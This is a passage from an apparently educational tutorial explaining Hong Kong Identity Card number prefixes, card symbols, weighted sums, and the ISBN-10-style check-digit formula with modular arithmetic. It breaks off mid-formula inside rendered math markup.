March 1983 and 31 July 1990, if a child most born between 1972 and 1979</td> </tr> <tr> <td><strong>L</strong></td> <td>Issued between 1983 and 2003, used when computer system malfunctioned, held by very few people</td> </tr> <tr> <td><strong>M</strong></td> <td>First issue of ID card between 1 August 2011 and 23 February 2020</td> </tr> <tr> <td><strong>N</strong></td> <td>Birth registered in Hong Kong after 1 June 2019</td> </tr> <tr> <td><strong>P</strong></td> <td>First issue of an ID card between 1 August 1990 and 27 December 2000, if a child most born between July and December 1979</td> </tr> <tr> <td><strong>R</strong></td> <td>First issue of an ID card between 28 December 2000 and 31 July 2011</td> </tr> <tr> <td><strong>S</strong></td> <td>Birth registered in Hong Kong between 1 April 2005 and 31 May 2019</td> </tr> <tr> <td><strong>T</strong></td> <td>Issued between 1983 and 1997, used when computer system malfunctioned, very few people hold</td> </tr> <tr> <td><strong>V</strong></td> <td>Child under 11 issued with a "Document of Identity for Visa Purposes" between 28 March 1983 and 31 August 2003</td> </tr> <tr> <td><strong>W</strong></td> <td>First issue to a foreign labourer or foreign domestic helper between 10 November 1989 and 1 January 2009</td> </tr> <tr> <td><strong>Y</strong></td> <td>Birth registered in Hong Kong between 1 January 1989 and 31 March 2005</td> </tr> <tr> <td><strong>Z</strong></td> <td>Birth registered in Hong Kong between 1 January 1980 and 31 December 1988</td> </tr> </tbody> </table></div> <h4> Double Letters: </h4> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Prefix</th> <th>Explanation / Issuance</th> </tr> </thead> <tbody> <tr> <td><strong>EC</strong></td> <td>Issued between 1993 and 2003, for European Community officers in Hong Kong (and dependents)</td> </tr> <tr> <td><strong>WX</strong></td> <td>First issue to a foreign labourer or foreign domestic helper since 2 January 2009</td> </tr> <tr> <td><strong>XA/XB/XC/XD/XE/XG/XH</strong></td> <td>ID card issued to person without a Chinese name before 27 March 1983</td> </tr> </tbody> </table></div> <p> </p> <h3> 1.3 Symbols on the Card </h3> <p> <br> Symbols under the date of birth have the following meanings:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Symbol</th> <th>Meaning</th> </tr> </thead> <tbody> <tr> <td><code>***</code></td> <td>Age 18 or over, eligible for Hong Kong Re-entry Permit</td> </tr> <tr> <td><code>*</code></td> <td>Age 11–17, eligible for Hong Kong Re-entry Permit</td> </tr> <tr> <td><code>A</code></td> <td>Right of abode in Hong Kong</td> </tr> <tr> <td><code>B</code></td> <td>Birth date/place changed since first registration</td> </tr> <tr> <td><code>C</code></td> <td>Stay in HKSAR is limited</td> </tr> <tr> <td><code>N</code></td> <td>Name changed since first registration</td> </tr> <tr> <td><code>O</code></td> <td>Born outside Hong Kong, Mainland China, or Macau</td> </tr> <tr> <td><code>R</code></td> <td>Right to land in HKSAR</td> </tr> <tr> <td><code>U</code></td> <td>Stay in HKSAR not limited</td> </tr> <tr> <td><code>W</code></td> <td>Born in Macau</td> </tr> <tr> <td><code>X</code></td> <td>Born in Mainland China</td> </tr> <tr> <td><code>Y</code></td> <td>Birth date confirmed by Immigration</td> </tr> <tr> <td><code>Z</code></td> <td>Born in Hong Kong</td> </tr> <tr> <td> <code>AO</code>, <code>AW</code>, <code>AX</code>, <code>AZ</code> </td> <td>Right of abode in Hong Kong and place of birth is Other, Macau, Mainland China, or Hong Kong, respectively</td> </tr> </tbody> </table></div> <p><strong>Examples:</strong></p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Example</th> <th>Meaning</th> </tr> </thead> <tbody> <tr> <td><code>***AZ</code></td> <td>Aged 18 or over, eligible for re-entry permit (<code>***</code>), right of abode in Hong Kong (<code>A</code>), born in Hong Kong (<code>Z</code>)</td> </tr> <tr> <td><code>*AZ</code></td> <td>Aged 11–17, eligible for re-entry permit (<code>*</code>), right of abode in Hong Kong (<code>A</code>), born in Hong Kong (<code>Z</code>)</td> </tr> <tr> <td><code>AW</code></td> <td>Right of abode in Hong Kong (<code>A</code>), born in Macau (<code>W</code>)</td> </tr> </tbody> </table></div> <p> </p> <blockquote> <p>For further details, see Wikipedia: <a href="https://en.wikipedia.org/wiki/Hong_Kong_identity_card" rel="noopener noreferrer">Hong Kong identity card – Meaning of first letter(s)</a></p> </blockquote> <h2> 2. (Optional) What You Need to Know Before Verifying a Hong Kong Identity Card (HKID): Weight Function and Check Digit </h2> <p> <br> Before you can accurately verify a Hong Kong Identity Card (HKID) number, it's important to understand two key concepts:</p> <ul> <li><p>Weight Function:<br> This is used to calculate a <code>weighted sum</code> by multiplying each digit (or character) of the HKID number by a specific weight. The result is used in the check digit calculation process.</p></li> <li><p>Check Digit:<br> This is a special digit added to the end of the HKID number, specifically designed to detect errors.</p></li> </ul> <p>Mastering these two pieces of knowledge will allow you to understand and implement the HKID verification process correctly and confidently.</p> <p> </p> <h3> 2.1 Understanding the Weight Function: The Concept and a Simple Example </h3> <p> </p> <blockquote> <p>⚠️⚠️⚠️ To understand this section, you may need high school-level math, such as <code>vectors</code> and the <code>summation (Σ)</code> formula.</p> </blockquote> <p> <br> According to Wikipedia’s article on <a href="https://en.wikipedia.org/wiki/Weight_function" rel="noopener noreferrer">Weight Function</a>, a weight function is a mathematical tool used when performing a sum, integral, or average, to give some elements more "weight" (or influence) than others. The result is called a <code>weighted sum</code> or a <code>weighted average</code>.</p> <p>Although weight functions can be applied to both <code>weighted sums</code>, <code>weighted averages</code>, <code>weighted integrals</code>, etc., ⚠️For the purposes of the HKID check digit calculation, it is sufficient to <u><strong>focus only on the concept of the <code>weighted sum</code></strong></u>. Understanding how to calculate a weighted sum is all you need for this context, knowledge of weighted averages and other applications is not necessary.</p> <p>Before we dive into the concept of a <code>weighted sum</code>, let’s look at a simple example to understand how weighted calculations work in everyday situations.</p> <p> <br> <strong>Simple Example</strong></p> <p>Suppose you have three test scores:</p> <ul> <li>Chinese: 85</li> <li>English: 92</li> <li>Math: 78</li> </ul> <p>Your teacher thinks Chinese is the most important and assigns different weights:</p> <ul> <li>Chinese: 3</li> <li>English: 2</li> <li>Math: 1</li> </ul> <p>The weighted sum is calculated as:<br> Weighted Sum = 85 × 3 + 92 × 2 + 78 × 1 = 255 + 184 + 78 = 517</p> <p> <br> This means the Chinese score contributes the most to the total.</p> <p> <br> It’s pretty straightforward, isn’t it? 😊 Now, let’s see how we can express this process using a mathematical formula.</p> <p> <br> <strong>Mathematical Representation</strong></p> <p>For a vector of values <code>X</code> and a vector of weights <code>W</code>, where<br> X=[𝑥1, 𝑥2, …, 𝑥n],<br> W=[𝑤1, 𝑤2, …, 𝑤n]</p> <p>the <code>weighted sum</code> is:</p> <p> </p> <div class="katex-element"> <span class="katex-display"><span class="katex"><span class="katex-mathml">Weighted Sum=∑i=1nwixi=W⋅X \text{Weighted Sum} = \sum_{i=1}^{n} w_i x_i = \mathbf{W} \cdot \mathbf{X} </span><span class="katex-html"><span class="base"><span class="strut"></span><span class="mord text"><span class="mord">Weighted Sum</span></span><span class="mspace"></span><span class="mrel">=</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mop op-limits"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">i</span><span class="mrel mtight">=</span><span class="mord mtight">1</span></span></span></span><span><span class="pstrut"></span><span><span class="mop op-symbol large-op">∑</span></span></span><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">n</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span><span class="mspace"></span><span class="mord"><span class="mord mathnormal">w</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mrel">=</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord mathbf">W</span><span class="mspace"></span><span class="mbin">⋅</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord mathbf">X</span></span></span></span></span> </div> <blockquote> <p>The dot product notation (W⋅X) is a compact way of expressing the sum of products of corresponding elements in the two vectors. This is equivalent to: <br> </p> <div class="katex-element"> <span class="katex-display"><span class="katex"><span class="katex-mathml">w1x1+w2x2+⋯+wnxn w_1 x_1 + w_2 x_2 + \cdots + w_n x_n </span><span class="katex-html"><span class="base"><span class="strut"></span><span class="mord"><span class="mord mathnormal">w</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">1</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">1</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord"><span class="mord mathnormal">w</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">2</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">2</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="minner">⋯</span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord"><span class="mord mathnormal">w</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span></span></span></span></span> </div> </blockquote> <p>This means:<br> Multiply each value by its corresponding weight, then sum all the results.</p> <p> <br> <strong>Why Do We Need to Know the Weighted Sum? 🤔</strong></p> <p>Understanding the <code>weighted sum</code> is important because the <code>check digit</code> formula for things like HKID actually uses this concept at its core. The check digit isn't just a random number—it's calculated based on the <u>sum of all the digits and letters in the ID, but each one is first multiplied by a different weight before being added together</u>.</p> <p> </p> <h3> 2.2 Exploring Common Check Digit Algorithm </h3> <p> </p> <blockquote> <p>⚠️⚠️⚠️ To understand this section, you may need high school-level math, such as Modular arithmetic and the summation (Σ) formula.</p> </blockquote> <p> <br> I found many documents online about the HKID check digit 📄, but there is no official documentation explaining how to verify or calculate it 😔. Many sources suggest the method is similar to the <code>ISBN-10</code> check digit formula, so understanding ISBN-10 is useful for this purpose.</p> <p> <br> A <strong>check digit</strong> is added to identification numbers to detect errors. Common methods include:</p> <ul> <li> <strong>UPC/EAN/GTIN</strong>: Odd-position digits × 3, add even-position digits, sum, then (sum mod 10). If not zero, subtract from 10.</li> <li> <strong>ISBN-10</strong>: Each digit × its position (right to left), sum, then (sum mod 11) should be 0. If 10, use 'X'.</li> <li> <strong>ISBN-13</strong>: Odd-position digits + (even-position digits × 3), sum, then (sum mod 10). If not zero, subtract from 10.</li> <li> <strong>NCDA</strong>: Used for special identifiers, can detect single-character and transposition errors.</li> </ul> <p>⚠️For <strong>HKID</strong>, just focus on the <strong>ISBN-10 method</strong>.</p> <p>For more details, see <a href="https://en.wikipedia.org/wiki/Check_digit" rel="noopener noreferrer">Check digit</a>.</p> <p> <br> <strong>ISBN-10</strong></p> <p><a href="https://en.wikipedia.org/wiki/ISBN#ISBN-10_check_digits" rel="noopener noreferrer">ISBN-10</a> is a 10-digit identifier used for books published before 2007. The last digit is a <strong>check digit</strong> used to detect errors. The check digit is calculated so that the weighted sum of all digits is a multiple of 11.</p> <p>The formula for a valid ISBN-10 is:</p> <div class="katex-element"> <span class="katex-display"><span class="katex"><span class="katex-mathml">∑i=110(11−i)xi≡0(mod11) \sum_{i=1}^{10} (11-i) x_i \equiv 0 \pmod{11} </span><span class="katex-html"><span class="base"><span class="strut"></span><span class="mop op-limits"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">i</span><span class="mrel mtight">=</span><span class="mord mtight">1</span></span></span></span><span><span class="pstrut"></span><span><span class="mop op-symbol large-op">∑</span></span></span><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">10</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span><span class="mopen">(</span><span class="mord">11</span><span class="mspace"></span><span class="mbin">−</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord mathnormal">i</span><span class="mclose">)</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mrel">≡</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">0</span><span class="mspace allowbreak"></span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace"></span><span class="mord">11</span><span class="mclose">)</span></span></span></span></span> </div> <p>This means each digit is multiplied by a descending weight from 10 to 1, and the sum is evaluated using <a href="https://en.wikipedia.org/wiki/ISBN#ISBN-10_check_digits" rel="noopener noreferrer">modular arithmetic</a>.</p> <p> <br> Based on our study of weighted sum math knowledge in <strong>2.1</strong>, we can simplify the formula to:</p> <div class="katex-element"> <span class="katex-display"><span class="katex"><span class="katex-mathml">10x1+9x2+8x3+7x4+6x5+5x6+4x7+3x8+2x9+x10≡0(mod11) 10x_1 + 9x_2 + 8x_3 + 7x_4 + 6x_5 + 5x_6 + 4x_7 + 3x_8 + 2x_9 + x_{10} \equiv 0 \pmod{11} </span><span class="katex-html"><span class="base"><span class="strut"></span><span class="mord">10</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">1</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">9</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">2</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">8</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">3</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">7</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">4</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">6</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">5</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">5</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">6</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">4</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">7</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">3</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">8</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">2</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">9</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">10</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mrel">≡</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">0</span><span class="mspace allowbreak"></span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace"></span><span class="mord">11</span><span class="mclose">)</span></span></span></span></span> </div> <p> <br> <strong>Modular Arithmetic</strong></p> <p>Modular arithmetic is a system for computing with integers, where numbers “wrap around” after reaching a certain fixed value called the <em>modulus</em>. This means, just like the hours on a clock reset after reaching 12, numbers in modular arithmetic reset after reaching the modulus. Calculations are always performed with respect to this modulus.</p> <p> <br> <strong>Congruence in Modular Arithmetic</strong></p> <p>Congruence is the mathematical relation that expresses when two numbers are considered equivalent in modular arithmetic. Specifically, two integers (a) and (b) are said to be <em>congruent modulo</em> (m) if they have the same remainder when divided by (m). This relationship is written as:</p> <div class="katex-element"> <span class="katex-display"><span class="katex"><span class="katex-mathml">a≡b(modm) a \equiv b \pmod{m} </span><span class="katex-html"><span class="base"><span class="strut"></span><span class="mord mathnormal">a</span><span class="mspace"></span><span class="mrel">≡</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord mathnormal">b</span><span class="mspace allowbreak"></span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace"></span><span class="mord mathnormal">m</span><span class="mclose">)</span></span></span></span></span> </div> <p>This means that the difference (a - b) is divisible by (m), or equivalently, (a) and (b) belong to the same position (congruence class) in the modular system with modulus (m).</p> <blockquote> <p><strong>Note:</strong><br> The parentheses in "a ≡ b (mod m)" mean that "mod m" applies to the whole equation, not just to the right side.</p> <p>This is different from "b mod m", which gives the <em>remainder</em> when b is divided by m. In other words, "b mod m" is the unique r such that:</p> <div class="katex-element"> <span class="katex-display"><span class="katex"><span class="katex-mathml">0≤r&lt;mandr≡b(modm) 0 \leq r &lt; m \quad \text{and} \quad r \equiv b \pmod{m} </span><span class="katex-html"><span class="base"><span class="strut"></span><span class="mord">0</span><span class="mspace"></span><span class="mrel">≤</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord mathnormal">r</span><span class="mspace"></span><span class="mrel">&lt;</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord mathnormal">m</span><span class="mspace"></span><span class="mord text"><span class="mord">and</span></span><span class="mspace"></span><span class="mord mathnormal">r</span><span class="mspace"></span><span class="mrel">≡</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord mathnormal">b</span><span class="mspace allowbreak"></span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace"></span><span class="mord mathnormal">m</span><span class="mclose">)</span></span></span></span></span> </div> <p>So, "a ≡ b (mod m)" shows a relationship, while "b mod m" gives a specific remainder.</p> </blockquote> <p> <br> <strong>Example Calculation</strong></p> <p>Suppose you want to compute (17 mod 5):</p> <ul> <li>Divide 17 by 5: 17 ÷ 5 = 3 remainder 2</li> <li>So, 17 ≡ 2 (mod 5)</li> </ul> <p>Alternatively, 17 − 2 = 15, and 15 is a multiple of 5.</p> <p> <br> <strong>Summary Table</strong></p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Expression</th> <th>Meaning</th> </tr> </thead> <tbody> <tr> <td>a ≡ b (mod m)</td> <td>a and 𝑏 leave the same remainder when divided by 𝑚</td> </tr> <tr> <td>17 ≡ 2 (mod 5)</td> <td>Both 17 and 2 leave remainder 2 when divided by 5</td> </tr> </tbody> </table></div> <p>Modular arithmetic and congruence are deeply linked: modular arithmetic sets the rules for “wrapping around,” and congruence gives us the formal way to describe equality in this system.</p> <p>For more, see <a href="https://en.wikipedia.org/wiki/Modular_arithmetic" rel="noopener noreferrer">Modular arithmetic - Wikipedia</a>.</p> <h2> 3. (Optional) Where Does the HKID Check Digit Formula Come From? </h2> <p> <br> If you’ve forgotten the ISBN-10 check digit formula, don’t worry 😊—this guide will remind you and show how it transforms into the HKID check digit formula.</p> <p>The ISBN-10 check digit formula works by multiplying each digit by a specific weight, summing them, and ensuring the total is divisible by 11. The Standard mathematical expression is:</p> <div class="katex-element"> <span class="katex-display"><span class="katex"><span class="katex-mathml">∑i=110(11−i)xi≡0(mod11) \sum_{i=1}^{10} (11-i) x_i \equiv 0 \pmod{11} </span><span class="katex-html"><span class="base"><span class="strut"></span><span class="mop op-limits"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">i</span><span class="mrel mtight">=</span><span class="mord mtight">1</span></span></span></span><span><span class="pstrut"></span><span><span class="mop op-symbol large-op">∑</span></span></span><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">10</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span><span class="mopen">(</span><span class="mord">11</span><span class="mspace"></span><span class="mbin">−</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord mathnormal">i</span><span class="mclose">)</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mrel">≡</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">0</span><span class="mspace allowbreak"></span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace"></span><span class="mord">11</span><span class="mclose">)</span></span></span></span></span> </div> <p>When expanded, this becomes:</p> <div class="katex-element"> <span class="katex-display"><span class="katex"><span class="katex-mathml">10x1+9x2+8x3+7x4+6x5+5x6+4x7+3x8+2x9+x10≡0(mod11) 10x_1 + 9x_2 + 8x_3 + 7x_4 + 6x_5 + 5x_6 + 4x_7 + 3x_8 + 2x_9 + x_{10} \equiv 0 \pmod{11} </span><span class="katex-html"><span class="base"><span class="strut"></span><span class="mord">10</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">1</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">9</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">2</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">8</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">3</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">7</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">4</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">6</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">5</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">5</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">6</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">4</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">7</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">3</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist"><span><span class="pstrut"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">8</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist"><span></span></span></span></span></span></span><span class="mspace"></span><span class="mbin">+</span><span class="mspace"></span></span><span class="base"><span class="strut"></span><span class="mord">2</span><span class="mord"><span class="mord 